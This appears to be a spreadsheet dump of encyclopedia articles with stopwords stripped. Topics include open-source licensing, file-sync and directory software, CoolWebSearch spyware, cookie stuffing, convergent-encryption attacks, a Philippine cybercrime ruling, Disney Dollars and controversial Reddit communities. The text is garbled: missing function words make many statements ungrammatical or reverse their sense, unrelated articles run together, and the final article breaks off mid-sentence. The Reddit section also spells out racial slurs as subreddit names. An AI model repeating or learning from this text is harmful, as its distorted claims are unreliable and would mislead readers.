restrictions version includes specific language prohibiting additional restrictions enforced hardware restrictions digital rights management (drm), practice calls tivoization tivo used gpl’d software devices disallowed user modification software. attribution, disclaimers notices majority free-software licenses require modified software claim unmodified. some licenses also require copyright holders credited. example version gpl, requires interactive programs print warranty license information, notices removed modified versions intended distribution. practical problems licenses license compatibility licenses software packages containing contradictory requirements render impossible combine source code packages order create software packages. license compatibility copyleft license another license often one-way compatibility. this "one-way compatibility" characteristic instanced, criticized apache foundation, provides permissive apache license characteristic. non-copyleft licenses, foss permissive licenses, less complicated license interaction normally exhibit better license compatibility. example, license says "modified versions must mention developers advertising materials", another license says "modified versions cannot contain additional attribution requirements", then, someone combined software package uses license software package uses other, would impossible distribute combination contradictory requirements cannot fulfilled simultaneously. thus, packages would license-incompatible. when comes copyleft software licenses, inherently compatible copyleft licenses, even gplv2 itself, compatible gplv3. purpose restrictions software ("use restrictions") generally unacceptable according fsf, osi, debian, bsd-based distributions. examples include prohibiting software used non-private applications, military purposes, comparison benchmarking, good use, ethically questionable means, commercial organizations. while restrictions user freedom, e.g. concerning nuclear war, seem enjoy moral support among free software developers, generally believed agendas served software licenses; among things practical aspects resulting legal uncertainties problems enforceability vague, broad and/or subjective criteria tool makers generally held responsible people’s tools. nevertheless projects include legally non-binding pleas user, prominently sqlite. among repeated attempts developers regulate user behavior license sparked wider debate douglas crockford’s (joking) evil” clause, affected release process debian distribution 2012 jsmin-php project expelled google code, addition pacifist condition based asimov’s first robotics distributed computing software 2005, well several software projects trying exclude cloud providers. definition conflicts several defining organizations groups publish definitions guidelines foss licenses, notably fsf, osi, debian project, bsds, sometimes conflicting opinions interpretations. permissive versus copyleft opinions many users developers bsd-based operating systems different position licensing. main difference belief copyleft licenses, particularly general public license (gpl), undesirably complicated and/or restrictive. requires derivative work also released according license not. essentially, license's requirement acknowledge original authors, poses restrictions source code used. result, code used proprietary software acknowledges authors. instance, microsoft windows macos proprietary stacks derived bsd-licensed software. extreme cases, sub- re-licensing possibilities permissive licenses might prevent open-source ecosystem. instance, mathworks' fileexchange repository offers license user contributions prevents additional terms usage beside proprietary matlab software, instance foss octave software.supporters license argue free grants right anything source code, provided attribution preserved. approach code used widely used proprietary software. proponents point code becomes proprietary, users denied freedoms define free software. result, consider license less free gpl, freedom lack restriction. since license restricts right developers changes recontributed community, neither "free" sense "lacking restrictions." debian debian project uses criteria laid debian free software guidelines (dfsg). notable cases debian free software foundation disagree artistic license free documentation license (gfdl). debian accepts original artistic license free software license, disagrees. this little impact however since artistic license almost always used dual-license setup, along general public license. controversial borderline cases vast majority free software uses undisputed free-software licenses; however, many debates whether certain licenses qualify definition. examples licenses provoked debate series apple public source license, accepted open source initiative free software foundation debian realnetworks public source license, accepted open source initiative free software foundation debian. also, recommended free documentation license, incompatible gpl, considered "non-free" debian project around 2006, nathanael nerode, bruce perens. argues documentation qualitatively different software subject different requirements. debian accepted, later resolution, complied debian free software guidelines controversial "invariant section" removed, considers "still free trouble". notwithstanding, documentation includes "invariant sections". similarly, floss manuals foundation, organization devoted creating manuals free software, decided eschew gfdl favor texts 2007, citing incompatibility two, difficulties implementing gfdl, fact gfdl "does allow easy duplication modification", especially digital documentation.sluc software license published spain december 2006 allow military use. writers license maintain free software, free software foundation says free infringes so-called "zero freedom" gpl, freedom software purpose. market share while historically widely used foss license gplv2, 2015, according black duck software permissive license dethroned gplv2 second place permissive apache license follows third place. study 2012, used publicly available data, criticized black duck software publishing methodology used collecting statistics. daniel german, professor department computer science university victoria canada, presented talk 2013 methodological challenges determining widely used free-software licenses, showed could replicate result black duck software.a github study 2015 statistical data found license prominent foss license platform.in june 2016 analysis fedora project's packages showed used licenses family, followed mit, bsd, family, artistic (for perl packages), lppl (for texlive packages), asl. gplv2+ single popular license also comparison free open-source software licenses developer certificate origin end-user license agreement license-free software list free-content licenses public domain software license notes references rosen, lawrence july 2004). open source licensing: software freedom intellectual property law. prentice hall. isbn 978-0-13-148787-1. external links free software definition, free software foundation. free software foundation's list free non-free licenses debian's license information page open source initiative's list licenses openbsd's "goals" page describes view free software transcripts license strategy discussions archived 2009-02-21 wayback machine, mostly stallman moglen, drafting gplv3 understanding open source free software licensing, andrew laurent report free software business models licensing pages) 45-page licensing primer software freedom center open source best practices</t>
  </si>
  <si>
    <t>DirSync Pro</t>
  </si>
  <si>
    <t>dirsync open-source file synchronization backup utility windows, linux macos. dirsync based program directory synchronize (dirsync), first released february 2003 elias gerber. subsequently developed frank gerbig groetzner. dirsync released givi july 2008, based branch dirsync code. many parts dirsync gone major rewriting redesign ever since.dirsync offers graphical user interface user manage multiple synchronization tasks. version 1.31, supports local folder folder synchronization, support synchronization yet. application self-contained within directory, therefore fully portable.dirsync makes possible compare couple directories synchronize content. used create incremental backups. synchronization mirror directory another unidirectionally, synchronize content directories bidirectionally. before synchronization, user analysis source destination. dirsync detects kind changes file/directory source (e.g. file/directory modification, move, deletion, renaming) synchronize destination accordingly. features dirsync provides following predefined synchronization modes: synchronize (incremental): this mode makes shadow directory only modified files copied synchronize (incremental): this mode makes shadow directory only modified files copied synchronize (incremental): this mode mirrors directories other. only modified files copied. synchronize (custom): this custom mode mirror directories advanced options could user's need. backup (full): this mode makes full copy directory directory files copied. restore (full): this mode makes full copy directory directory files copied. contribute this mode copies files directory directory modified files left away. contribute this mode copies files directory directory modified files left away. synchronize (custom): this custom mode synchronize directory directory mode advanced options could user's need. synchronize (custom): this custom mode synchronize directory directory mode advanced options could user's need.when synchronizing bi-directionally, dirsync detects synchronization conflicts. these conflicts occur file edited directories independently. dirsync offers options solve bi-directional synchronization conflict: copy latest modified file directories. copy largest modified file directories. rename copy files directories. nothing warn user decides himself.when synchronizing mono-directionally custom mode, dirsync detects synchronization conflicts. these conflicts occur file edited destination directory independently. dirsync offers options solve mono-directional synchronization conflicts: overwrite file destination file source nothing warn user decides nothing ignore conflict.dirsync lets user configure unlimited number filters include exclude files directories. user combination unlimited number filters following types: filter based string patterns file/directory names. filter based file sizes. (smaller than, equal, larger than). filter based modification dates (earlier than, date, later than). filter based absolute path. filter based attributes (dos/ms windows only). filter based file ownerships (user group, posix only). filter based file permissions (posix systems only).dirsync schedule engine many options schedule synchronization tasks, e.g. every minute, hourly, daily, weekly, monthly. dirsync many logging facilities create detailed logs job, jobset, globally. dirsync preserves (synchronizes) file attributes, posix file permissions ownerships supports symbolic links. reception linux.com rated utility positively, saying makes defining bidirectional sync simple picking directories". likewise, freshmeat calls "powerful, easy-to-configure tool synchronize contents directory another". also comparison file synchronization software notes references external links official website</t>
  </si>
  <si>
    <t>Directory System Agent</t>
  </si>
  <si>
    <t>directory system agent (dsa) element x.500 directory service provides user agents access portion directory (usually portion associated single organizational unit). x.500 international standard developed international organization standardization (iso) international telecommunication union (itu-t). model function directory system agent specified itu-t recommendation x.501. active directory microsoft's active directory collection servers daemon processes windows server systems provide various means clients access active directory data store.clients connect active directory using various communications protocols: ldap version 3.0—used windows 2000 windows clients ldap version security account manager (sam) interface—used windows clients mapi interface—used microsoft exchange server mapi clients proprietary interface—used active directory dsas communicate another replicate data amongst references rfcs 2148 deployment internet white pages service</t>
  </si>
  <si>
    <t>CoolWebSearch</t>
  </si>
  <si>
    <t>coolwebsearch (also known coolwwwsearch abbreviated cws) spyware virus program installs microsoft windows based computers. first appeared 2003. effects coolwebsearch numerous capabilities successfully installed user's computer. program change infected computer's browser homepage 'coolwebsearch.com', though originally thought work internet explorer, recent variants affect mozilla firefox well google chrome, others. infected computers create pop-up redirect websites, including pornography sites, collect private information users, slow connection speed. coolwebsearch uses various techniques evade detection removal, many common spyware removal programs unable properly remove software. since coolwebsearch bundled potentially unwanted software add-ons, users need uninstall unwanted programs first, coolwebsearch return, even user changed home page primary search engine. some versions coolwebsearch installed what's known 'drive-by installation', browsing infected webpage automatically install coolwebsearch without user's knowledge. coolwebsearch attempts evade detection labelling presents such, provide eula, data website directly associated certain variants insert links random text, leading advertisements. others attempt access websites redirected pay-per-click search engines install malware display ads. some variants coolwebsearch also links pornography, gambling sites user's desktop, internet explorer's bookmarks history. certain versions attempt edit users' trusted sites modify security settings well hide removal programs. variants often named effects msconfig, msoffice, mupdate, msinfo svchost32. possible creators website claims responsible browser hijacking. they affiliate program pays affiliates direct others site paid advertising links. coolwebsearch.com's terms service laws quebec, canada, whilst registration lists address british virgin islands, server appears hypercommunications massachusetts, usa. coolwebsearch also linked coolwebsearch.org appears related webcoolsearch.com. investigation connected stanislav avdeyko, koobface hacker, coolwebsearch. variants cool search search cws.addclass cws.alfasearch cws.bootconf cws.cameup cws.cassandra cws.control cws.ctfmon32 cws.datanotary cws.dnsrelay cws.dreplace cws.gonnasearch cws.googlems cws.hiddendll cws.homesearch cws.loadbat cws.look2me cws.msconfd cws.msconfig cws.msfind cws.msinfo cws.msoffice cws.msspi cws.mupdate cws.oemsyspnp cws.olehelp cws.oslogo cws.qttasks cws.q-url3 cws.realyellowpage cws.searchx cws.smartfinder cws.smartsearch cws.sounddrv cws.svchost32 cws.svcinit cws.systeminit cws.systime cws.tapicfg cws.therealsearch cws.vrape cws.winproc32 cws.winres cws.xmlmimefilter cws.xplugin cws.xxxvideo cws.yexe affiliate variants cws.aff.iedll cws.aff.madfinder cws.aff.tooncomics cws.aff.winshow references</t>
  </si>
  <si>
    <t>Directory service</t>
  </si>
  <si>
    <t>computing, directory service name service maps names network resources respective network addresses. shared information infrastructure locating, managing, administering organizing everyday items network resources, include volumes, folders, files, printers, users, groups, devices, telephone numbers objects. directory service critical component network operating system. directory server name server server provides service. each resource network considered object directory server. information particular resource stored collection attributes associated resource object. directory service defines namespace network. namespace used assign name (unique identifier) objects. directories typically rules determining network resources named identified, usually includes requirement identifiers unique unambiguous. when using directory service, user remember physical address network resource; providing name locates resource. some directory services include access control provisions, limiting availability directory information authorized users. comparison relational databases several things distinguish directory service relational database. data redundant aids performance.directory schemas object classes, attributes, name bindings knowledge (namespaces) object class has: must attributes instances must attributes defined instance omitted, absence similar null relational databaseattributes sometimes multi-valued, allowing multiple naming attributes level (such machine type serial number concatenation, multiple phone numbers "work phone"). attributes object classes usually standardized throughout industry; example, x.500 attributes classes often formally registered iana object therefore, directory applications reuse standard classes attributes maximize benefit existing directory-server software. object instances slotted namespaces; object class inherits parent object class (and ultimately root hierarchy), adding attributes must-may list. directory services often central security design system correspondingly-fine granularity access control. replication distribution replication distribution distinct meanings design management directory service. replication used indicate directory namespace (the objects) copied another directory server redundancy throughput reasons; replicated namespace governed authority. distribution used indicate multiple directory servers different namespaces interconnected form distributed directory service; namespace governed different authority. implementations directory services part open systems interconnection (osi) initiative common network standards multi-vendor interoperability. during 1980s, created standards directory services, initially support requirements inter-carrier electronic messaging network-name lookup. lightweight directory access protocol (ldap) based x.500 directory-information services, using tcp/ip stack x.500 directory access protocol (dap) string-encoding scheme internet. systems developed x.500 include: domain name system (dns): first directory service internet, still hesiod: based used mit's project athena network information service (nis): originally yellow pages (yp) microsystems' implementation directory service unix network environments. played role similar hesiod. netinfo: developed next late 1980s nextstep. after acquisition apple, released open source directory service deprecated ldap-based open directory. support netinfo removed release 10.5 leopard. banyan vines: first scalable directory service domains: developed microsoft provide directory services windows machines release ldap-based active directory windows 2000. windows vista continues support domains relaxing minimum authentication protocols. ldap implementations ldap/x.500-based implementations include: directory server: free open source server implementation hat, commercial support suse. active directory: microsoft's directory service windows, originating x.500 directory, created exchange server, first shipped windows 2000 server supported successive versions windows apache directory server: directory service, written java, supporting ldap, kerberos change password protocol; ldapv3 certified apple open directory: apple's directory server available server edirectory: netiq's implementation directory services supports multiple architectures, including windows, netware, linux several flavours unix used user administration configuration software management; previously known novell directory services. directory server: released directory server, acquired aol's netscape security solutions unit, commercial product running enterprise linux community-supported directory server project. upstream open source project called freeipa. oracle internet directory: (oid) oracle corporation's directory service, compatible ldap version java system directory server: microsystems' directory service opends: open-source directory service java, backed microsystems oracle unified directory: (oud) oracle corporation's next-generation unified directory solution. integrates storage, synchronization, proxy functionalities. tivoli directory server: custom build openldap release windows directory services (ntds), later renamed active directory, replaced former domain system. critical path directory server openldap: derived original university michigan ldap implementation (like netscape, hat, fedora jsds implementations), supports computer architectures (including unix unix derivatives, linux, windows, z/os number embedded-realtime systems). lotus domino nexor directory opendj java-based ldap server directory client runs operating environment, license cddl. developed forgerock, 2016, maintained opendj communityopen-source tools create directory services include openldap, kerberos protocol samba software, function windows domain controller kerberos ldap back ends. administration gosa samba swat. using name services unix systems name services unix systems typically configured nsswitch.conf. information name services retrieved getent. also access control list directory services markup language hierarchical database model ldap data interchange format metadirectory service delivery platform virtual directory references citations sources</t>
  </si>
  <si>
    <t>Cookie stuffing</t>
  </si>
  <si>
    <t>world wide web, cookie stuffing (also cookie dropping) affiliate marketing technique which, result visiting website, user receives third-party cookie website unrelated visited user, usually without user aware user later visits target website completes qualifying transaction (such making purchase), cookie stuffer paid commission target. because stuffer actually encouraged user visit target, technique considered illegitimate many affiliate schemes. process websites affiliate program commission affiliates introducing visitors complete qualifying transactions. other website owners often join affiliate programs earn commission, usually simply sending visitors site running affiliate program special link advertisement. when user clicks special link, single cookie usually placed user's computer. this considered normal practice; affiliate marketers generate genuine income. definition, cookies considered stuffed placed user's computer purely result viewing page, added time result single click. taken extreme dozens cookies stuffed scattergun approach hope user visit several target affiliate sites complete qualifying transaction. cookie stuffing often referred blackhat online marketing technique. this potential generate fraudulent affiliate income cookie stuffer, also overwrite legitimate affiliate cookies, essentially stealing commission another affiliate. perfectly normal user visit website, click link directed target affiliate site complete qualifying transaction time. that user revisit target affiliate website later time complete qualifying transaction. original referring affiliate would credited transaction make commission. however, many affiliate programs award commission recent referring affiliate, original referring affiliate. problem occurs cookie stuffing site stuffs visitors batch cookies scattergun approach. genuine affiliate cookie overwritten user visits target affiliate site completes qualifying transaction, cookie stuffer gets credit instead original affiliate brought first genuine visit target site. user-generated content operators websites allow user-generated content, forums allow users post content, aware various cookie stuffing techniques, combat them, order protect visitors type activity. cookie stuffing accomplished something simple including image forum post signature. image link compromised purpose cookie stuffer made simulate click forum visitors affiliate link. techniques techniques used accomplish cookie stuffing similar used cross-site request forgery (csrf) attacks. pop-ups pop-ups actually method cookie stuffing accepted affiliate networks. pop-up gets website visitor visit site course gives affiliate cookie. common place find happening review sites affiliate “reviews” product. companies commission customers interested product, still wanted information purchasing. this probably innocent form cookie stuffing, still stuffing none-the-less. this method defeated utilizing pop-up blocking software. frames iframes iframes embedding page within page. webmaster embeds page simple line code. affiliate embeds iframe onto page loads affiliate url. frames work similar fashion. frames deprecated modern browsers, techniques longer prevalent. images &lt;img&gt; html suggests browser attempt retrieve image url. matter supplied extension like ".jpg", ".gif", ".png" end. instance, &lt;img src="http://google.com"&gt; would actually anyone visits page send visit google. affiliate links directly creating redirect .htaccess. javascript javascript used force user visit result visiting affiliate url. stylesheets cascading style sheets define page displayed. they retrieved like image would browser instructed visit url. affiliate could direct affiliate style sheet image loaded way. this harder methods detect. flash adobe flash commonly used create interactive media web, contains functionality allows developers force website user visit affiliate link removing spoofing referrer information affiliate network know traffic came from. common tactic spoofed referring site legitimate white affiliate site mask fact cookie stuffing carried out. legal issues 2008, ebay sued four successful affiliate marketers platform used cookie stuffing techniques. brian dunning, host skeptoid podcast sentenced fifteen months prison $100 fine, five months prison $25,000 fine pleading guilty wire fraud. also search engine marketing mail wire fraud references</t>
  </si>
  <si>
    <t>Convergent encryption</t>
  </si>
  <si>
    <t>convergent encryption, also known content hash keying, cryptosystem produces identical ciphertext identical plaintext files. this applications cloud computing remove duplicate files storage without provider access encryption keys. combination deduplication convergent encryption described backup system patent filed stac electronics 1995. this combination used farsite, permabit, freenet, mojonation, gnunet, flud, tahoe least-authority file store.the system gained additional visibility 2011 cloud storage provider bitcasa announced using convergent encryption enable de-duplication data cloud storage service. overview system computes cryptographic hash plaintext question. system encrypts plaintext using hash key. finally, hash stored, encrypted chosen user. known attacks convergent encryption open "confirmation file attack" attacker effectively confirm whether target possesses certain file encrypting unencrypted, plain-text, version simply comparing output files possessed target. this attack poses problem user storing information non-unique, i.e. also either publicly available already held adversary example: banned books files cause copyright infringement. argument could made confirmation file attack rendered less effective adding unique piece data random characters plain text encryption; causes uploaded file unique therefore results unique encrypted file. however, implementations convergent encryption plain-text broken blocks based file content, block independently convergently encrypted inadvertently defeat attempts making file unique adding bytes beginning end.even alarming confirmation attack "learn remaining information attack" described drew perttula 2008. this type attack applies encryption files slight variations public document. example, defender encrypts bank form including digit bank account number, attacker aware generic bank form format extract defender's bank account number producing bank forms possible bank account numbers, encrypt comparing encryptions defender's encrypted file deduce bank account number. note attack extended attack large number targets (all spelling variations target bank customer example above, even potential bank customers), presence problem extends type form document: returns, financial documents, healthcare forms, employment forms, etc. also note known method decreasing severity attack adding random bytes files stored help, since bytes likewise attacked "learn remaining information" approach. effective approach mitigating attack encrypt contents files non-convergent secret storing (negating benefit convergent encryption), simply convergent encryption first place. also salt (cryptography) deterministic encryption references</t>
  </si>
  <si>
    <t>Disconnect (software)</t>
  </si>
  <si>
    <t>disconnect partly open source browser extension mobile designed stop non-consensual third party trackers, providing private search private browsing. mobile, available android iphone. developed brian kennish casey oppenheim. disconnect-search default search engine security-focused browser, uses duckduckgo.the electronic frontier foundation compared privacy badger browser plugin.the banned google play store five days release late august 2014. google cited violation terms service prohibit developers using store distribute apps interfere disrupt services third party". this, however, attracted criticism parties (and disconnect itself) privacy-friendly, argue google's motivations primarily based fact interferes ad-based revenue models numerous companies, including google itself. restored google play store weeks initial banning, banned second time overnight.in june 2015, disconnect filed antitrust complaint google. also blocking tracking beacon website visitor tracking references external links official website</t>
  </si>
  <si>
    <t>Disinfectant (software)</t>
  </si>
  <si>
    <t>disinfectant popular antivirus software program classic originally released freeware john norstad spring 1989. disinfectant featured system extension would detect virus infections application users could scan remove viruses. versions disinfectant subsequently released detect additional viruses. levitus praised recommended disinfectant 1992. 1998, norstad retired disinfectant, citing danger posed macro viruses, disinfectant detect, inability single individual maintain program caught them. references</t>
  </si>
  <si>
    <t>Disini v. Secretary of Justice</t>
  </si>
  <si>
    <t>disini secretary justice (g.r. nos. 203335, al.) landmark ruling supreme court philippines handed february 2014. when congress philippines passed cybercrime prevention 2012 bill immediately controversial, especially strict penalties crime "cyberlibel", upgraded form already existing criminal libel charge found revised penal code philippines.in end, court declared law, including cyberlibel provision, constitutional. ruling's abridgement free expression widely criticized critics law, including attorney harry roque. decision reached disini paved anti-fake news provisions bayanihan heal act. petition several petitions almost immediately submitted supreme court questioning constitutionality upon signing, including petition jose jesus disini, september harvard-educated lawyer professor university philippines college whose name title case derives. initial deferment protests october supreme court initially chose defer action petitions, citing absence justices prevented court sitting banc. initial lack temporary restraining order meant went effect scheduled october protest, filipino netizens reacted blacking facebook profile pictures trending hashtag #notocybercrimelaw twitter. "anonymous" also defaced government websites, including bangko sentral pilipinas, metropolitan waterworks sewerage system intellectual property office. temporary restraining order october 2012, supreme court decided issue temporary restraining order (tro), pausing implementation days. early december 2012, government requested lifting tro, denied. consolidated fifteen petitions filed point case. oral arguments over four hours oral arguments petitioners heard january 2013, followed three-hour rebuttal office solicitor general, representing government, january 2013. this first time philippine history oral arguments uploaded online supreme court. ruling february 2014, ruling penned justice roberto abad, supreme court ruled 12–1–2 constitutional, although struck provisions, including ones violated double jeopardy. total, §4(c)(3), (only relation §4(c)(2), §4(c)(3), §4(c)(4)), (only relation sections §4(c)(2) §4(c)(4)), §12, struck court unconstitutional.notably, "likes" "retweets" libelous content, originally also criminalized libel law, found legal, instance court modified interpretation section 4(c)(4). only justice marvic leonen dissented ruling, writing believes whole idea criminal libel unconstitutional, assailing court finding note also court's justification higher penalties given cybercrimes, prisión mayor (six twelve years prison) cyberlibel:there exists substantial distinction crimes committed information communications technology similar crimes committed using means. using technology question, offender often evades identification able reach victims cause greater harm. distinction, therefore, creates basis higher penalties cybercrimes.the court's ruling also puts burden proof whether malice defendant rather petitioner, even petitioner public figure. dissent part, justice antonio carpio called provision "clearly repugnant constitution." motion reconsideration while motions reconsideration immediately filed numerous petitioners, including center media freedom responsibility, rejected finality april 2014. however, justice arturo brion, originally wrote separate concurring opinion, changed vote dissent reconsidering whether impose higher penalties cyberlibel regular libel. also people philippines santos, ressa rappler references external links selected briefs petitioners jose jesus disini jr.; rowena disini; lianne pascua-medina (september 2012), jose jesus disini jr., secretary justice, (petition certiorari prohibition), disini disini office, g.r. 203335 internet archive jose manuel diokno; pablito sanidad; ricardo sunga iii; theodore (october 2012), national union journalists philippines, executive secretary, (petition certiorari, prohibition injunction application immediate restraining order other extraordinary legal equitable reliefs), national union journalists philippines; free legal assistance group, g.r. 203453 internet archive government respondents francis jardeleza; bernard pascual; sarah jane fernandez; marsha recon; (december 2012), louis "barok" biraogo national bureau investigation, (pdf) (consolidated comment partial manifestation), makati: office solicitor general philippines, g.r. nos. 203299, wikimedia commons rulings jose jesus disini jr., secretary justice, al., supreme court philippines, february 2014, g.r. nos. 203335, jose jesus disini jr., secretary justice, (ruling motion reconsideration), supreme court philippines, april 2014, g.r. nos. 203335,</t>
  </si>
  <si>
    <t>DiskImageMounter</t>
  </si>
  <si>
    <t>diskimagemounter utility handles mounting disk volume images starting version 10.3. diskimagemounter works either launching daemon handle disk image contacting running dæmon mount disk. like bomarchivehelper, diskimagemounter double-clicked; nothing. program ever displays window progress mount options (cancel skip verification) error report could mount image. found /system/library/coreservices/diskimagemounter.app. starting version 10.7, apple "removed double-click support images using legacy metadata." diskimagemounter able open .img (ndif only), .smi (self mounting), .dc42 (disk copy 4.2), .dart (dart) disk image formats previously supported version 10.6 earlier. image formats supported diskimagemounter supports variety disk image file types: apple disk image (.dmg, com.apple.disk-image) udif disk images (.udif, com.apple.disk-image-udif); udif segment (.devs, .dmgpart, com.apple.disk-image-udif-segment) self mounting image (.smi, com.apple.disk-image-smi) dvd/cd-r master image (.toast, .dvdr, .cdr, com.apple.disk-image-cdr, com.roxio.disk-image-toast) disk image segment (dmgpart) disk image (ostypes: devr, hdrv, ddim, com.apple.disk-image-raw) drive container (ostypes: opcd, com.apple.disk-image-pc) image (.iso, public.iso-image) sparse disk image (.sparseimage, com.apple.disk-image-sparse, .sparsebundle)as macos 11.0, support following formats removed: disk copy disk image (.dc42, .diskcopy42, com.apple.disk-image-dc42) dart disk image (.dart, com.apple.disk-image-dart) ndif disk image (.ndif, .img, com.apple.disk-image-ndif); ndif disk image segment (.imgpart, com.apple.disk-image-ndif-segment) notes references also disk copy program's predecessor. hdiutil command line tool counterpart ships macos fastdmg free alternative replacement diskimagemounter</t>
  </si>
  <si>
    <t>Disney Dollars</t>
  </si>
  <si>
    <t>disney dollars form corporate scrip previously sold walt disney company redeemable goods services many disney facilities.similar size design paper currency united states, bills bear image mickey mouse, minnie mouse, donald duck, goofy, pluto, dumbo, drawing landmarks disneyland resort walt disney world resort. disney dollars came series d—the former created disneyland resort southern california latter walt disney world resort central florida.despite currency discontinued printing sale disney 2016, must, still does, accept bills company's united states theme parks, disney cruise ships, disney store certain parts castaway cay, disney's private island caribbean. history disney dollars first used disneyland 1987, walt disney world started currency used epcot october 1992, disney stores started using scrip. mickey mouse's 65th birthday 1993, special disney dollar issued.every disney dollar signed "treasurer" scrooge mcduck, image tinker bell front. bills redeemable goods services disney theme parks, disney cruise ships, disney's castaway port call disney stores, unless indications contrary printed individual bills. however, compatible coin machines, must exchanged u.s. currency machines used. addition, disney dollars used purchases change given, change provided u.s. currency.they often kept souvenirs collected disney memorabilia fans, disney resorts, also exchanged back u.s. currency.disney stopped distributing printing currency 2016; however, still accept future. security features disney dollars created anti-counterfeiting features microprinting, reflective imprinting front back bill deter scanning copying. addition, bills printed serial numbers letters unique bill. dollars small bits glitter scattered them. references external links disney dollars information resource</t>
  </si>
  <si>
    <t>Controversial Reddit communities</t>
  </si>
  <si>
    <t>controversial reddit communities communities social news site reddit (known "subreddits") devoted explicit, violent, hateful material topic controversy. subreddit r/jailbait, devoted suggestive revealing photos underage girls, prominent subreddits site closed october 2011, following report cnn. another controversial subreddit, r/creepshots, devoted revealing suggestive photos women taken without awareness consent, occurred year r/jailbait's closure. r/creepshots backlash prompted gawker exposé subreddit's moderators adrian chen, revealed real-life identity user behind account, michael brutsch. this started discussion media ethics anonymity outing internet. quarantining 2015, reddit introduced quarantine policy make visiting certain subreddits difficult. visiting joining quarantined subreddit requires bypassing warning prompt. addition, quarantined subreddits appear non-subscription based (aggregate) feeds r/all order prevent accidental viewing, generate revenue, user count visible. since 2018, subreddits allowed appeal quarantine. banned subreddits banned subreddits refers subreddits reddit shuts indefinitely. beatingwomen june 2014, subreddit called r/beatingwomen closed reddit. community, featured graphic depictions violence women, banned moderators found sharing users' personal information online, collaborating protect another sitewide bans. following ban, community's founder rebooted subreddit name r/beatingwomen2 attempt circumvent ban, banned afterwards. braincels r/braincels popular subreddit incels, "involuntary celibates", r/incels (see below) banned, gaining 16,900 followers april 2018. subreddit's leaders decided individuals advocating murder. subreddit promoted rape suicide. subreddit banned 2019, violating reddit's content policy respect bullying harassment. chapotraphouse r/chapotraphouse subreddit dedicated leftist podcast chapo trap house associated term dirtbag left. community 160,000 regulars banned june 2020, "consistently host rule-breaking content mods demonstrated intention reining community." previously, community quarantined content promotes violence. community subreddit later migrated instance lemmy, reddit alternative. "chimpire" term "chimpire" refers collection subreddits affiliated websites promoted anti-black racism, including frequent racial slurs. june 2013, subreddit r/niggers banned reddit engaging vote manipulation, incitements violence, using racist content disrupt communities. reddit general manager erik martin noted subforum given multiple chances comply site rules, noting "users tell amount warnings extended subreddit clearly awful r/niggers decision subreddits scrutiny". following r/niggers, subreddit r/coontown grew become popular "chimpire" site, 15,000 members peak. many posters subreddits formerly involved r/niggers.one subreddits, r/shitniggerssay, banned june 2015 time r/fatpeoplehate. midst changes reddit's content policy, r/coontown banned august 2015. chodi r/chodi, whose name derived crude hindi sexual slang term, right-wing indian subreddit claimed "free speech memes, jokes, satire, sarcasm fun". sub, 90,000 subscribers january 2022, frequently propagated islamophobic, anti-christian, homophobic, misogynistic content, open calls genocide muslims. time reports users used intentional misspellings slang circumvent reddit's anti-hate speech software. quint cited subreddit's popularity example reddit used hate speech india. banned march 2022, promoting hate, causing users move telegram. creepshots year closure r/jailbait, another subreddit called r/creepshots drew controversy press hosting sexualized images women without knowledge. wake media attention, u/violentacrez added r/creepshots moderator; reports emerged gawker reporter adrian chen planning exposé would reveal real-life identity user, moderated dozens controversial subreddits, well hundred general-interest communities. several major subreddits banned links gawker response impending exposé, account u/violentacrez deleted. moderators defended decisions block site sections reddit basis impending report "doxing" term exposing identity pseudonymous person), exposure threatened site's structural integrity.when chen informed u/violentacrez impending exposé, user pleaded chen publish concerned potential impact employment finances, noting wife disabled mortgage pay. also expressed concern would falsely labeled child pornographer antisemite, subreddits created. despite u/violentacrez's offer delete postings leave reddit, chen insisted would still publish piece. gawker exposé chen published piece october 2012, revealing person operating u/violentacrez account middle-aged programmer arlington, texas named michael brutsch. within article published, brutsch fired employer, link exposé briefly banned reddit. stated reddit article published received numerous death threats.reddit yishan wong defended content brutsch contributed site free speech, criticized efforts gawker link basis. wong stated staff considered site-wide link, rejected idea, fear would create negative impression site without getting results. brutsch later briefly returned reddit different account, criticized stated numerous factual inaccuracies gawker exposé.a week exposé, brutsch held interview aired anderson cooper 360°. interview journalist drew griffin, brutsch apologetic activity reddit. explained fond appreciation redditors, reddit helped relieve stress. brutsch also described support administrators, stating received award contributions. reddit noted award winning community vote "worst subreddit", stated regretted sending well claiming u/violentacrez account banned several occasions. brutsch subsequently noted reddit regretted interview, criticized accuracy statement reddit gave cnn.chris slowe, lead programmer reddit 2010, said relationship brutsch reddit staff: stayed thing knew least getting stuff particularly legal." ethics outing gawker's outing brutsch u/violentacrez contentious discussion privacy anonymity internet. such discussions included claims outing, "doxing", necessary draw attention objectionable content could removed, others claimed impeded ability people exercise right legal free speech online fear public retribution.jude doyle time known sady doyle), writing guardian, compared outing alleged blackmailer amanda todd, suggested outings justified. also stated also unduly focus attention individuals without confronting underlying problems, engaging "sensationalism" expense cultural reform. magazine, damon poeter stated that, defended protecting anonymity internet, still supported brutsch outed, felt various subreddits contributed u/violentacrez serious invasions privacy, regardless legality, therefore justifiable reveal personal details.the public outpouring hostility towards brutsch following exposé prompted commentators danah boyd wired michelle star cnet question morality outing enforce societal standards online. several commentators expressed concern public shaming brutsch serve example others legitimizing internet vigilantism, exposing individuals brutsch mass retribution. cringeanarchy r/cringeanarchy subreddit themed around "cringe" "edgy", politically incorrect content, featuring far-right content. originally uncensored (hence "anarchy") spinoff r/cringe, later shifted far-right, anti-transgender anti-"sjw" content taking over. subreddit quarantined september 2018, point 400,000 subscribers.following 2019 christchurch mosque shootings, anti-muslim posts made subreddit. subreddit banned april 2019, violating reddit's content policy regarding violent content. darknetmarkets subreddit r/darknetmarkets, darknet market discussion forum, featured participation owners, causing authorities request personal information behind several accounts. this subreddit banned march 2018. deepfakes deepfakes controversial subreddit superimposed famous female actresses onto pornographic videos, made using fakeapp, without consent actresses. such actresses included emma watson daisy ridley. after subreddit given notoriety press, videos subreddit banned gfycat discord. february 2018, pornhub banned videos, subreddit banned well. fatpeoplehate june 2015, reddit banned five subreddits, citing anti-harassment policy. largest banned subreddits, r/fatpeoplehate, estimated 151,000 subscribers time banning. r/fatpeoplehate hosted photos overweight people (mostly women) purpose mockery. four subreddits r/hamplanethatred, r/neofag, r/transfags, r/shitniggerssay. reddit admin said, subreddits allow communities subreddit platform harass individuals moderators take action".due ban, reddit users flooded site pictures overweight people, well photos reddit's interim ellen pao. decision subreddits, users moved voat, social aggregation website similar reddit, although fat-shaming forums continued exist reddit time. findbostonbombers following 2013 boston marathon bombing, members subreddit r/findbostonbombers wrongly identified number people suspects, including 17-year-old track 